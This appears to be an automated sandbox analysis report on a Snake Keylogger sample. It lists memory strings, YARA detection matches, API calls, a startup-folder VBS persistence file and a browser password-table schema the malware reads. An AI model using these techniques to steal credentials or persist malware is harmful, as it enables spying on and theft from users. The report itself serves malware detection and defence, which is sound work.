                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2515782521.000000000446B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030A5000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000307C000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003089000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003097000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003028000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003102000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000310F000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000313C000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003097000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000314B000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3312271782.000000000041B000.00000040.00000400.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                      Source: ishon.exe, 00000007.00000002.3315771924.0000000003054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
                      Source: LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030A5000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000307C000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003089000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003097000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003028000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003102000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000310F000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000313C000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003097000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000314B000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
                      Source: LAQfpnQvPQ.exe, ishon.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2219471547.000000000320E000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2504335246.000000000326E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: unknown HTTPS traffic detected: 104.21.1.182:443 -> 192.168.2.5:49710 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 104.21.1.182:443 -> 192.168.2.5:49746 version: TLS 1.2

                      System Summary

                      Source: 5.2.ishon.exe.4228890.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 5.2.ishon.exe.4228890.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 5.2.ishon.exe.4228890.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 5.2.ishon.exe.4228890.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                      Source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                      Source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                      Source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                      Source: 00000003.00000002.3312271782.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                      Source: 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                      Source: 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                      Source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                      Source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                      Source: Process Memory Space: LAQfpnQvPQ.exe PID: 5144, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                      Source: Process Memory Space: LAQfpnQvPQ.exe PID: 5144, type: MEMORYSTR, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                      Source: Process Memory Space: LAQfpnQvPQ.exe PID: 6364, type: MEMORYSTR, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                      Source: Process Memory Space: ishon.exe PID: 2888, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                      Source: Process Memory Space: ishon.exe PID: 2888, type: MEMORYSTR, Matched rule: Detects Snake Keylogger, Author: ditekSHen
                      Source: C:\Windows\System32\wscript.exe, COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe, Code function: 0_2_069FEF98 NtResumeThread,0_2_069FEF98
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe, Code function: 0_2_069FEF90 NtResumeThread,0_2_069FEF90
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe, Code function: 0_2_077FE8B8 NtProtectVirtualMemory,0_2_077FE8B8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe, Code function: 0_2_077FE8B0 NtProtectVirtualMemory,0_2_077FE8B0
                      Source: C:\Users\user\AppData\Roaming\ishon.exe, Code function: 5_2_0769CF98 NtProtectVirtualMemory,5_2_0769CF98
                      Source: C:\Users\user\AppData\Roaming\ishon.exe, Code function: 5_2_0769F430 NtResumeThread,5_2_0769F430
                      Source: C:\Users\user\AppData\Roaming\ishon.exe, Code function: 5_2_0769CF91 NtProtectVirtualMemory,5_2_0769CF91
                      Source: C:\Users\user\AppData\Roaming\ishon.exe, Code function: 5_2_0769F428 NtResumeThread,5_2_0769F428
                      Source: LAQfpnQvPQ.exe, Static PE information: invalid certificate
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2219471547.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilename vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2219471547.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2241775942.0000000006A10000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2243605676.0000000007450000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameYxafaye.dll" vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000000.00000000.2056233227.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenameRef#10784512.exeF vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameYxafaye.dll" vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2218583888.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000003.00000002.3312271782.0000000000422000.00000040.00000400.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, 00000003.00000002.3312735643.0000000000F67000.00000004.00000010.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameUNKNOWN_FILET vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, Binary or memory string: OriginalFilenameRef#10784512.exeF vs LAQfpnQvPQ.exe
                      Source: LAQfpnQvPQ.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 5.2.ishon.exe.4228890.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 5.2.ishon.exe.4228890.2.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 5.2.ishon.exe.4228890.2.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 5.2.ishon.exe.4228890.2.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: 00000003.00000002.3312271782.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: Process Memory Space: LAQfpnQvPQ.exe PID: 5144, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: LAQfpnQvPQ.exe PID: 5144, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: Process Memory Space: LAQfpnQvPQ.exe PID: 6364, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: Process Memory Space: ishon.exe PID: 2888, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: ishon.exe PID: 2888, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                      Source: LAQfpnQvPQ.exe, --.csCryptographic APIs: 'TransformFinalBlock'
                      Source: ishon.exe.0.dr, --.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs
                      Source: C:\Users\user\AppData\Roaming\ishon.exeMutant created: NULL
                      Source: LAQfpnQvPQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: LAQfpnQvPQ.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000315C000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3319653378.0000000003FBD000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000316B000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000317A000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000031CB000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3321113680.000000000401C000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000031D9000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000320D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: LAQfpnQvPQ.exeReversingLabs: Detection: 55%
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe File read: C:\Users\user\Desktop\LAQfpnQvPQ.exe
                      Source: unknownProcess created: C:\Users\user\Desktop\LAQfpnQvPQ.exe "C:\Users\user\Desktop\LAQfpnQvPQ.exe"
